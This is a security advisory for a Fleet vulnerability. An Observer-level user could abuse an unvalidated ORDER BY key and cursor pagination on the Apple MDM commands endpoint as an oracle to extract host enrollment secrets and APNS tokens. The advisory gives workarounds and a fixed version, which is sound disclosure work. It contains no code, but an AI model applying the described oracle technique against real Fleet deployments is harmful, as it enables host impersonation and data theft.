CVE-2026-46371
Fleet: Observer-level enrollment secret extraction via ORDER BY oracle on Apple MDM commands endpoint
Description
### Summary A vulnerability in Fleet's Apple MDM commands listing endpoint allowed authenticated users with the lowest-privilege Observer role to extract sensitive values from joined database tables — including host enrollment secrets and Apple Push Notification Service (APNS) tokens — through a cursor-based binary search oracle. The endpoint accepted a user-supplied `order_key` parameter that was not validated against a column allowlist. ### Impact The `GET /api/v1/fleet/mdm/apple/commands` endpoint constructs its query using a deprecated helper that did not restrict which columns could appear in the `ORDER BY` clause. The underlying query joins the `hosts` and `nano_enrollments` tables, so any column on those tables could be supplied as `order_key`. An attacker with Observer credentials could then use the cursor-based pagination parameter (`after`) to binary-search the value of the chosen column one character at a time. The targeted values never appeared in the response body, but the presence or absence of results revealed each character. With extracted `node_key` or `orbit_node_key` values, an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. The APNS values are exploitable only by a party that also possesses the organization's APNS certificate. Exploitation required authenticated Observer access and a Fleet deployment with Apple MDM enabled and at least one queued MDM command. Instances without Apple MDM configured were not affected. ### Workarounds If an immediate upgrade is not possible, administrators should: - Restrict the Observer role to fully trusted users until the patch is applied - Rotate `node_key` and `orbit_node_key` for any host suspected of exposure by re-enrolling the affected hosts ### For more information If there are any questions or comments about this advisory: Email Fleet at [[email protected]](mailto:[email protected]) Join #fleet in [osquery Slack](https://join.slack.com/t/osquery/shared_invite/zt-h29zm0gk-s2DBtGUTW4CFel0f0IjTEw) ### Credits Fleet thanks the Security Team at Palantir Technologies for responsibly reporting this issue.
How to fix CVE-2026-46371
To remediate CVE-2026-46371, upgrade the affected package to a fixed version below.
- —upgrade to 4.84.2 or later